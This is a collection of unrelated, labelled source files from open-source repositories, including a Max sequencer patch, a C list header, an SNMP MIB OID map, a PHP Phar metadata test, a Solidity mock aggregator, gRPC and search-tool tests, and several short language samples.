"patchline" : { "destination" : [ "obj-11", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-16", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-16", 1 ], "hidden" : 0, "midpoints" : [ 69.5, 428.0, 250.0, 428.0, 250.0, 332.0, 234.5, 332.0 ], "source" : [ "obj-11", 0 ] } } , { "patchline" : { "destination" : [ "obj-23", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-11", 0 ] } } , { "patchline" : { "destination" : [ "obj-41", 1 ], "hidden" : 0, "midpoints" : [ 189.5, 418.0, 265.0, 418.0, 265.0, 198.0, 99.5, 198.0 ], "source" : [ "obj-11", 1 ] } } , { "patchline" : { "destination" : [ "obj-6", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-11", 0 ] } } , { "patchline" : { "destination" : [ "obj-11", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-15", 0 ] } } , { "patchline" : { "destination" : [ "obj-16", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-15", 0 ] } } , { "patchline" : { "destination" : [ "obj-11", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-16", 0 ] } } , { "patchline" : { "destination" : [ "obj-44", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-2", 1 ] } } , { "patchline" : { "destination" : [ "obj-48", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-2", 0 ] } } , { "patchline" : { "destination" : [ "obj-15", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-41", 0 ] } } , { "patchline" : { "destination" : [ "obj-41", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-44", 0 ] } } , { "patchline" : { "destination" : [ "obj-41", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-48", 0 ] } } , { "patchline" : { "destination" : [ "obj-2", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-7", 0 ] } } ] } , "patching_rect" : [ 300.0, 105.0, 142.0, 23.0 ], "saved_object_attributes" : { "fontface" : 0, "fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "default_fontsize" : 12.0, "fontname" : "Arial", "globalpatchername" : "" } , "text" : "p generative-tempo" } } , { "box" : { "fontname" : "Arial", "fontsize" : 18.0, "id" : "obj-8", "maxclass" : "number", "numinlets" : 1, "numoutlets" : 2, "outlettype" : [ "int", "bang" ], "patching_rect" : [ 180.0, 150.0, 65.0, 27.0 ] } } , { "box" : { "comment" : "loop_start (bang)", "id" : "obj-5", "maxclass" : "outlet", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 225.0, 465.0, 25.0, 25.0 ] } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-35", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 2, "outlettype" : [ "bang", "" ], "patching_rect" : [ 225.0, 390.0, 36.0, 20.0 ], "text" : "sel 0" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-32", "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 240.0, 225.0, 24.0, 20.0 ], "text" : "8n" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-30", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "float" ], "patching_rect" : [ 180.0, 225.0, 32.5, 20.0 ], "text" : "/ 2." } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-29", "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 240.0, 195.0, 40.0, 20.0 ], "text" : "to ms" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-23", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "float" ], "patching_rect" : [ 180.0, 195.0, 57.0, 20.0 ], "text" : "!/ 60000." } } , { "box" : { "annotation" : "", "comment" : "step (0-15)", "hint" : "", "id" : "obj-2", "maxclass" : "outlet", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 135.0, 465.0, 25.0, 25.0 ] } } , { "box" : { "comment" : "start/stop (1/0)", "id" : "obj-1", "maxclass" : "inlet", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 135.0, 60.0, 25.0, 25.0 ] } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-20", "maxclass" : "message", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 75.0, 315.0, 37.0, 18.0 ], "text" : "set 0" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-13", "maxclass" : "newobj", "numinlets" : 5, "numoutlets" : 4, "outlettype" : [ "int", "", "", "int" ], "patching_rect" : [ 135.0, 345.0, 73.0, 20.0 ], "text" : "counter 15" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-7", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 2, "outlettype" : [ "bang", "bang" ], "patching_rect" : [ 75.0, 285.0, 54.0, 20.0 ], "text" : "togedge" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-3", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "bang" ], "patching_rect" : [ 135.0, 285.0, 64.0, 20.0 ], "text" : "metro 250" } } ], "lines" : [ { "patchline" : { "destination" : [ "obj-14", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-18", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-6", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-2", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-13", 0 ] } } , { "patchline" : { "destination" : [ "obj-35", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-13", 0 ] } } , { "patchline" : { "destination" : [ "obj-4", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-13", 0 ] } } , { "patchline" : { "destination" : [ "obj-8", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-14", 0 ] } } , { "patchline" : { "destination" : [ "obj-5", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-17", 0 ] } } , { "patchline" : { "destination" : [ "obj-3", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-18", 0 ] } } , { "patchline" : { "destination" : [ "obj-7", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-18", 1 ] } } , { "patchline" : { "destination" : [ "obj-13", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-20", 0 ] } } , { "patchline" : { "destination" : [ "obj-30", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-23", 0 ] } } , { "patchline" : { "destination" : [ "obj-13", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-3", 0 ] } } , { "patchline" : { "destination" : [ "obj-12", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-30", 0 ] } } , { "patchline" : { "destination" : [ "obj-3", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-30", 0 ] } } , { "patchline" : { "destination" : [ "obj-9", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-30", 0 ] } } , { "patchline" : { "destination" : [ "obj-17", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-35", 0 ] } } , { "patchline" : { "destination" : [ "obj-20", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-7", 0 ] } } , { "patchline" : { "destination" : [ "obj-23", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-8", 0 ] } } ] } , "patching_rect" : [ 75.0, 315.0, 154.0, 23.0 ], "saved_object_attributes" : { "fontface" : 0, "fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "default_fontsize" : 12.0, "fontname" : "Arial", "globalpatchername" : "" } , "text" : "p sequencer" } } , { "box" : { "id" : "obj-71", "maxclass" : "kslider", "numinlets" : 2, "numoutlets" : 2, "outlettype" : [ "int", "int" ], "patching_rect" : [ 135.0, 435.0, 196.0, 34.0 ], "presentation" : 1, "presentation_rect" : [ 165.0, 120.0, 196.0, 34.0 ] } } , { "box" : { "id" : "obj-61", "maxclass" : "button", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "bang" ], "patching_rect" : [ 90.0, 435.0, 34.0, 34.0 ], "presentation" : 1, "presentation_rect" : [ 120.0, 120.0, 34.0, 34.0 ] } } , { "box" : { "id" : "obj-48", "maxclass" : "slider", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 90.0, 345.0, 99.0, 20.0 ], "presentation" : 1, "presentation_rect" : [ 120.0, 90.0, 240.0, 20.0 ], "size" : 16.0 } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-47", "maxclass" : "message", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 75.0, 210.0, 32.5, 18.0 ], "text" : "1" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-45", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "bang" ], "patching_rect" : [ 75.0, 180.0, 60.0, 20.0 ], "text" : "loadbang" } } , { "box" : { "color" : [ 0.811765, 0.372549, 0.372549, 1.0 ], "fontname" : "Arial Bold", "fontsize" : 14.0, "id" : "obj-22", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 75.0, 390.0, 105.0, 23.0 ], "text" : "js playback.js" } } , { "box" : { "color" : [ 0.811765, 0.372549, 0.372549, 1.0 ], "fontname" : "Arial Bold", "fontsize" : 14.0, "id" : "obj-6", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 75.0, 120.0, 92.0, 23.0 ], "text" : "js receive.js" } } , { "box" : { "color" : [ 0.678431, 0.819608, 0.819608, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-8", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 210.0, 375.0, 140.0, 20.0 ], "text" : "udpsend 127.0.0.1 7406" } } , { "box" : { "id" : "obj-5", "maxclass" : "toggle", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 75.0, 240.0, 40.0, 40.0 ], "presentation" : 1, "presentation_rect" : [ 45.0, 90.0, 60.0, 60.0 ] } } , { "box" : { "color" : [ 0.678431, 0.819608, 0.819608, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-1", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 75.0, 90.0, 99.0, 20.0 ], "text" : "udpreceive 7403" } } , { "box" : { "bgcolor" : [ 0.94902, 0.94902, 0.94902, 1.0 ], "id" : "obj-81", "maxclass" : "panel", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 30.0, 75.0, 340.0, 80.0 ] } } , { "box" : { "bgcolor" : [ 0.94902, 0.94902, 0.94902, 1.0 ], "id" : "obj-83", "maxclass" : "panel", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 30.0, 165.0, 340.0, 453.0 ], "presentation" : 1, "presentation_rect" : [ 30.0, 77.0, 340.0, 89.0 ] } } ], "lines" : [ { "patchline" : { "destination" : [ "obj-6", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-5", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-10", 0 ] } } , { "patchline" : { "destination" : [ "obj-2", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-11", 0 ] } } , { "patchline" : { "destination" : [ "obj-4", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-13", 0 ] } } , { "patchline" : { "destination" : [ "obj-55", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-16", 1 ] } } , { "patchline" : { "destination" : [ "obj-55", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-16", 0 ] } } , { "patchline" : { "destination" : [ "obj-16", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-2", 0 ] } } , { "patchline" : { "destination" : [ "obj-2", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-22", 0 ] } } , { "patchline" : { "destination" : [ "obj-61", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-22", 0 ] } } , { "patchline" : { "destination" : [ "obj-71", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-22", 0 ] } } , { "patchline" : { "destination" : [ "obj-47", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-45", 0 ] } } , { "patchline" : { "destination" : [ "obj-5", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-47", 0 ] } } , { "patchline" : { "destination" : [ "obj-77", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-5", 0 ] } } , { "patchline" : { "destination" : [ "obj-22", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-77", 0 ] } } , { "patchline" : { "destination" : [ "obj-48", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-77", 0 ] } } , { "patchline" : { "destination" : [ "obj-80", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-77", 1 ] } } , { "patchline" : { "destination" : [ "obj-8", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-80", 0 ] } } , { "patchline" : { "destination" : [ "obj-10", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-9", 0 ] } } ] } }
Max
3
rlugojr/ChromeWebLab
Orchestra/sw/hub/max/sequencer.maxpat
[ "Apache-2.0" ]
/* EINA - EFL data type library * Copyright (C) 2013 Jérémy Zurcher * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; * if not, see <http://www.gnu.org/licenses/>. */ #ifndef EINA_INLIST_INLINE_H_ #define EINA_INLIST_INLINE_H_ static inline Eina_Inlist * eina_inlist_first(const Eina_Inlist *list) { Eina_Inlist *l; if (!list) return NULL; for (l = (Eina_Inlist*)list; l->prev; l = l->prev); return l; } static inline Eina_Inlist * eina_inlist_last(const Eina_Inlist *list) { Eina_Inlist *l; if (!list) return NULL; for (l = (Eina_Inlist*)list; l->next; l = l->next); return l; } #endif /* EINA_INLIST_INLINE_H_ */
Logos
4
AkshayJainG/veles
libVeles/eina/eina_inline_inlist.x
[ "Apache-2.0" ]
--- ptopoConnLocalPort: 1.3.6.1.2.1.79.1.1.1.1.3 ptopoConnRemotePort: 1.3.6.1.2.1.79.1.1.1.1.8 ptopoConnLastVerifyTime: 1.3.6.1.2.1.79.1.1.1.1.15 ptopoConnRowStatus: 1.3.6.1.2.1.79.1.1.1.1.16 ptopoLastChangeTime: 1.3.6.1.2.1.79.1.2.1 ptopoConformance: 1.3.6.1.2.1.79.4 ptopoConnRemotePortType: 1.3.6.1.2.1.79.1.1.1.1.7 ptopoConfig: 1.3.6.1.2.1.79.1.3 ptopoConfigTrapInterval: 1.3.6.1.2.1.79.1.3.1 ptopoMIBNotifications: 1.3.6.1.2.1.79.2 ptopoGroups: 1.3.6.1.2.1.79.4.2 ptopoData: 1.3.6.1.2.1.79.1.1 ptopoConnAgentNetAddr: 1.3.6.1.2.1.79.1.1.1.1.11 ptopoConnRemoteChassis: 1.3.6.1.2.1.79.1.1.1.1.6 ptopoConnMultiMacSASeen: 1.3.6.1.2.1.79.1.1.1.1.12 ptopoConnMultiNetSASeen: 1.3.6.1.2.1.79.1.1.1.1.13 ptopoConnRemoteChassisType: 1.3.6.1.2.1.79.1.1.1.1.5 ptopoConfigMaxHoldTime: 1.3.6.1.2.1.79.1.3.2 ptopoDiscoveryMechanisms: 1.3.6.1.2.1.79.3.1 ptopoConnTimeMark: 1.3.6.1.2.1.79.1.1.1.1.1 ptopoConnTabInserts: 1.3.6.1.2.1.79.1.2.2 ptopoConnTabAgeouts: 1.3.6.1.2.1.79.1.2.5 ptopoMIBTrapPrefix: 1.3.6.1.2.1.79.2.0 ptopoDiscoveryLocal: 1.3.6.1.2.1.79.3.1.1 ptopoConfigChange: 1.3.6.1.2.1.79.2.0.1 ptopoMIB: 1.3.6.1.2.1.79 ptopoMIBObjects: 1.3.6.1.2.1.79.1 ptopoConnTable: 1.3.6.1.2.1.79.1.1.1 ptopoConnEntry: 1.3.6.1.2.1.79.1.1.1.1 ptopoConnLocalChassis: 1.3.6.1.2.1.79.1.1.1.1.2 ptopoConnIndex: 1.3.6.1.2.1.79.1.1.1.1.4 ptopoRegistrationPoints: 1.3.6.1.2.1.79.3 ptopoConnAgentNetAddrType: 1.3.6.1.2.1.79.1.1.1.1.10 ptopoConnIsStatic: 1.3.6.1.2.1.79.1.1.1.1.14 ptopoCompliances: 1.3.6.1.2.1.79.4.1 ptopoConnDiscAlgorithm: 1.3.6.1.2.1.79.1.1.1.1.9 ptopoGeneral: 1.3.6.1.2.1.79.1.2 ptopoConnTabDeletes: 1.3.6.1.2.1.79.1.2.3 ptopoConnTabDrops: 1.3.6.1.2.1.79.1.2.4
YAML
2
OsmanDere/metasploit-framework
data/snmp/mibs/PTOPO-MIB.yaml
[ "BSD-2-Clause", "BSD-3-Clause" ]
--TEST-- Phar with object in metadata --EXTENSIONS-- phar --INI-- phar.require_hash=0 phar.readonly=0 --FILE-- <?php class EchoesOnWakeup { public function __wakeup() { echo "In __wakeup " . spl_object_id($this) . "\n"; } public function __destruct() { echo "In __destruct " . spl_object_id($this) . "\n"; } } class ThrowsOnSerialize { public function __sleep() { throw new RuntimeException("In sleep"); } } $fname = __DIR__ . '/' . basename(__FILE__, '.php') . '.phar.php'; $pname = 'phar://' . $fname; $file = "<?php __HALT_COMPILER(); ?>"; $files = array(); $files['a'] = array('cont' => 'a', 'meta' => new EchoesOnWakeup()); include 'files/phar_test.inc'; foreach($files as $name => $cont) { var_dump(file_get_contents($pname.'/'.$name)); } unset($files); $phar = new Phar($fname); echo "Loading metadata for 'a' without allowed_classes\n"; var_dump($phar['a']->getMetadata(['allowed_classes' => []])); echo "Loading metadata for 'a' with allowed_classes\n"; var_dump($phar['a']->getMetadata(['allowed_classes' => true])); unset($phar); // NOTE: Phar will use the cached value of metadata if setMetaData was called on that Phar path before. // Save the writes to the phar and use a different file path. $fname_new = "$fname.copy.php"; copy($fname, $fname_new); $phar = new Phar($fname_new); echo "Loading metadata from 'a' from the new phar\n"; var_dump($phar['a']->getMetadata()); echo "Loading metadata from 'a' from the new phar with unserialize options\n"; var_dump($phar['a']->getMetadata(['allowed_classes' => true])); // PharEntry->setMetaData will do the following: // 1. serialize, checking for exceptions // 2. free the original data, checking for exceptions or the data getting set from destructors or error handlers. // 3. set the new data. try { var_dump($phar['a']->setMetadata(new ThrowsOnSerialize())); } catch (RuntimeException $e) { echo "Caught {$e->getMessage()} at {$e->getFile()}:{$e->getLine()}\n"; unset($e); } var_dump($phar['a']->getMetadata([])); var_dump($phar['a']->getMetadata(['allowed_classes' => false])); ?> --CLEAN-- <?php unlink(__DIR__ . '/' . basename(__FILE__, '.clean.php') . '.phar.php'); unlink(__DIR__ . '/' . basename(__FILE__, '.clean.php') . '.phar.php.copy.php'); ?> --EXPECTF-- In __destruct 1 string(1) "a" Loading metadata for 'a' without allowed_classes object(__PHP_Incomplete_Class)#3 (1) { ["__PHP_Incomplete_Class_Name"]=> string(14) "EchoesOnWakeup" } Loading metadata for 'a' with allowed_classes In __wakeup 2 object(EchoesOnWakeup)#2 (0) { } In __destruct 2 Loading metadata from 'a' from the new phar In __wakeup 3 object(EchoesOnWakeup)#3 (0) { } In __destruct 3 Loading metadata from 'a' from the new phar with unserialize options In __wakeup 2 object(EchoesOnWakeup)#2 (0) { } In __destruct 2 Caught In sleep at %sphar_metadata_write4.php:12 In __wakeup 3 object(EchoesOnWakeup)#3 (0) { } In __destruct 3 object(__PHP_Incomplete_Class)#4 (1) { ["__PHP_Incomplete_Class_Name"]=> string(14) "EchoesOnWakeup" }
PHP
4
NathanFreeman/php-src
ext/phar/tests/phar_metadata_write4.phpt
[ "PHP-3.01" ]
function f(p: A) => p;
TypeScript
1
nilamjadhav/TypeScript
tests/cases/conformance/parser/ecmascript5/ErrorRecovery/parserErrantEqualsGreaterThanAfterFunction2.ts
[ "Apache-2.0" ]
using OpenCV const cv = OpenCV # chess1.png is at https://raw.githubusercontent.com/opencv/opencv_extra/master/testdata/cv/cameracalibration/chess1.png img = cv.imread("chess1.png",cv.IMREAD_GRAYSCALE) climg = cv.cvtColor(img, cv.COLOR_GRAY2BGR) # Find the chess board corners ret, corners = cv.findChessboardCorners(img, cv.Size{Int32}(7,5)) # If found, add object points, image points (after refining them) if ret climg = cv.drawChessboardCorners(climg, cv.Size{Int32}(7,5), corners,ret) cv.imshow("img",climg) cv.waitKey(Int32(0)) cv.destroyAllWindows() end
Julia
4
ptelang/opencv_contrib
modules/julia/samples/chessboard_corners.jl
[ "Apache-2.0" ]
// SPDX-License-Identifier: MIT pragma solidity ^0.7.0; import "../interfaces/AggregatorInterface.sol"; /** * @title MockV2Aggregator * @notice Based on the HistoricAggregator contract * @notice Use this contract when you need to test * other contract's ability to read data from an * aggregator contract, but how the aggregator got * its answer is unimportant */ contract MockV2Aggregator is AggregatorInterface { int256 public override latestAnswer; uint256 public override latestTimestamp; uint256 public override latestRound; mapping(uint256 => int256) public override getAnswer; mapping(uint256 => uint256) public override getTimestamp; mapping(uint256 => uint256) private getStartedAt; constructor(int256 _initialAnswer) public { updateAnswer(_initialAnswer); } function updateAnswer(int256 _answer) public { latestAnswer = _answer; latestTimestamp = block.timestamp; latestRound++; getAnswer[latestRound] = _answer; getTimestamp[latestRound] = block.timestamp; } function updateRoundData( uint256 _roundId, int256 _answer, uint256 _timestamp, uint256 _startedAt ) public { latestRound = _roundId; latestAnswer = _answer; latestTimestamp = _timestamp; getAnswer[latestRound] = _answer; getTimestamp[latestRound] = _timestamp; getStartedAt[latestRound] = _startedAt; } }
Solidity
4
solidity-external-tests/chainlink
contracts/src/v0.7/tests/MockV2Aggregator.sol
[ "MIT" ]
# Copyright 2019 the gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test for multiprocessing example.""" import ast import logging import math import os import re import subprocess import tempfile import unittest _BINARY_DIR = os.path.realpath( os.path.join(os.path.dirname(os.path.abspath(__file__)), '..')) _SERVER_PATH = os.path.join(_BINARY_DIR, 'server') _CLIENT_PATH = os.path.join(_BINARY_DIR, 'client') def is_prime(n): for i in range(2, int(math.ceil(math.sqrt(n)))): if n % i == 0: return False else: return True def _get_server_address(server_stream): while True: server_stream.seek(0) line = server_stream.readline() while line: matches = re.search('Binding to \'(.+)\'', line) if matches is not None: return matches.groups()[0] line = server_stream.readline() class MultiprocessingExampleTest(unittest.TestCase): def test_multiprocessing_example(self): server_stdout = tempfile.TemporaryFile(mode='r') server_process = subprocess.Popen((_SERVER_PATH,), stdout=server_stdout) server_address = _get_server_address(server_stdout) client_stdout = tempfile.TemporaryFile(mode='r') client_process = subprocess.Popen(( _CLIENT_PATH, server_address, ), stdout=client_stdout) client_process.wait() server_process.terminate() client_stdout.seek(0) results = ast.literal_eval(client_stdout.read().strip().split('\n')[-1]) values = tuple(result[0] for result in results) self.assertSequenceEqual(range(2, 10000), values) for result in results: self.assertEqual(is_prime(result[0]), result[1]) if __name__ == '__main__': logging.basicConfig() unittest.main(verbosity=2)
Python
4
arghyadip01/grpc
examples/python/multiprocessing/test/_multiprocessing_example_test.py
[ "Apache-2.0" ]
=== MQL4/Libraries/OTMql4/OTZmqProcessCmd.mq4 === This is the replacement for what should be Eval in Mt4: take a string expression and valuate it. I know this is verbose and could be done more compactly, but it's clean and robust so I'll leave it like this for now. If you want to extend this for your own functions you have declared in Mql4, look at how zOTZmqProcessCmd calls zOTLibProcessCmd and then goes on and handles it if zOTLibProcessCmd didn't. {{{string zOTZmqProcessCmd(string uMess) }}} This is the replacement for what should be Eval in Mt4: take a string expression and evaluate it. zMt4LibProcessCmd handles base Mt4 expressions, and zOTLibProcessCmd also handles base OpenTrading expressions. and zOTZmqProcessCmd also handles base OTMql4Zmq expressions. Returns the result of processing the command. Returns "" if there is an error. {{{string uProcessCmdZmq (string uCmd, string uChartId, string uIgnore, string uArg1, string uArg2, string uArg3, string uArg4, string uArg5) }}} Source code: [[MQL4/Libraries/OTMql4/OTZmqProcessCmd.mq4|https://github.com/OpenTrading/OTMql4Zmq/raw/master/MQL4/Libraries/OTMql4/OTZmqProcessCmd.mq4]] This file is automatically generated from the source code: do not edit. ---- Parent: [[CodeLibraries]]
Creole
4
lionelyoung/OTMql4Zmq
wiki/OTZmqProcessCmd.creole
[ "MIT" ]
Setup: $ . $TESTDIR/setup.sh $ printf 'Foo\n' >> ./sample $ printf 'bar\n' >> ./sample Smart case by default: $ ag foo sample 1:Foo $ ag FOO sample [1] $ ag 'f.o' sample 1:Foo $ ag Foo sample 1:Foo $ ag 'F.o' sample 1:Foo Case sensitive mode: $ ag -s foo sample [1] $ ag -s FOO sample [1] $ ag -s 'f.o' sample [1] $ ag -s Foo sample 1:Foo $ ag -s 'F.o' sample 1:Foo Case insensitive mode: $ ag fOO -i sample 1:Foo $ ag fOO --ignore-case sample 1:Foo $ ag 'f.o' -i sample 1:Foo Case insensitive file regex $ ag -i -g 'Samp.*' sample
Perl
3
tdgroot/the_silver_searcher
tests/case_sensitivity.t
[ "Apache-2.0" ]
% Syntax Highlight Test File for MatLab % Some comments about this file % HelloWorld in MatLab disp('Hello World'); % And now some other randomness to test different color regions for j=1:4, j end A = 1; B = []; if(A|B) disp 'The statement is true', end; % Plotting Polynomials x=[27.7 28 29 30]; a=[4.1 4.3 4.1]; b=[0.749 0.503 -0.781]; c=[0.0 -0.819 -0.470]; d=[-0.910 0.116 0.157]; for i=1:3 ['p_' num2str(i) '(x) = ' num2str(a(i)) ' + ' ... num2str(b(i)) ' (x - ' num2str(x(i)) ') + ' ... num2str(c(i)) ' (x - ' num2str(x(i)) ')^2 + ' ... num2str(d(i)) ' (x - ' num2str(x(i)) ')^3'] end; %--------------------------------------------------------------------- function y = nev(xx,n,x,Q) % NEV Neville's algorithm as a function % y= nev(xx,n,x,Q) % % inputs: % n = order of interpolation (n+1 = # of points) % x(1),...,x(n+1) x coords % Q(1),...,Q(n+1) y coords % xx=evaluation point for interpolating polynomial p % % output: p(xx) for i = n:-1:1 for j = 1:i Q(j) = (xx-x(j))*Q(j+1) - (xx-x(j+n+1-i))*Q(j); Q(j) = Q(j)/(x(j+n+1-i)-x(j)); end end y = Q(1); %--------------------------------------------------------------------- function ssum = geom(a,N) n=0:N; ssum = sum(a.^n); end
Matlab
5
ekkipermana/robotframework-test
Lib/site-packages/wx-2.8-msw-unicode/wx/tools/Editra/tests/syntax/matlab.matlab
[ "bzip2-1.0.6" ]
fn main() { let items = vec![1, 2, 3]; let ref_items: &[i32] = &items; let items_clone: Vec<i32> = ref_items.clone(); //~^ ERROR mismatched types // in that case no suggestion will be triggered let items_clone_2:Vec<i32> = items.clone(); let s = "hi"; let string: String = s.clone(); //~^ ERROR mismatched types // in that case no suggestion will be triggered let s2 = "hi"; let string_2: String = s2.to_string(); }
Rust
3
Eric-Arellano/rust
src/test/ui/issues/issue-53692.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
{-# OPTIONS --show-implicit #-} -- {-# OPTIONS -v tc.polarity:10 -v tc.inj:40 -v tc.conv.irr:20 #-} -- -v tc.mod.apply:100 #-} module Issue168 where postulate X : Set open import Issue168b open Membership X postulate P : Nat → Set lemma : ∀ n → P (id n) foo : P zero foo = lemma _
Agda
4
cruhland/agda
test/Succeed/Issue168.agda
[ "MIT" ]
PREFIX : <http://example.org/> PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> SELECT ?s1 ?s2 (BNODE(?s1) AS ?b1) (BNODE(?s2) AS ?b2) WHERE { ?a :str ?s1 . ?b :str ?s2 . FILTER (?a = :s1 || ?a = :s3) FILTER (?b = :s1 || ?b = :s3) }
SPARQL
3
alpano-unibz/ontop
test/sparql-compliance/src/test/resources/testcases-dawg-sparql-1.1/functions/bnode01.rq
[ "Apache-2.0" ]
@tableflux.h2o_temperature{surface_degrees, time}
FLUX
0
RohanSreerama5/flux
colm/tableflux/query01.flux
[ "MIT" ]
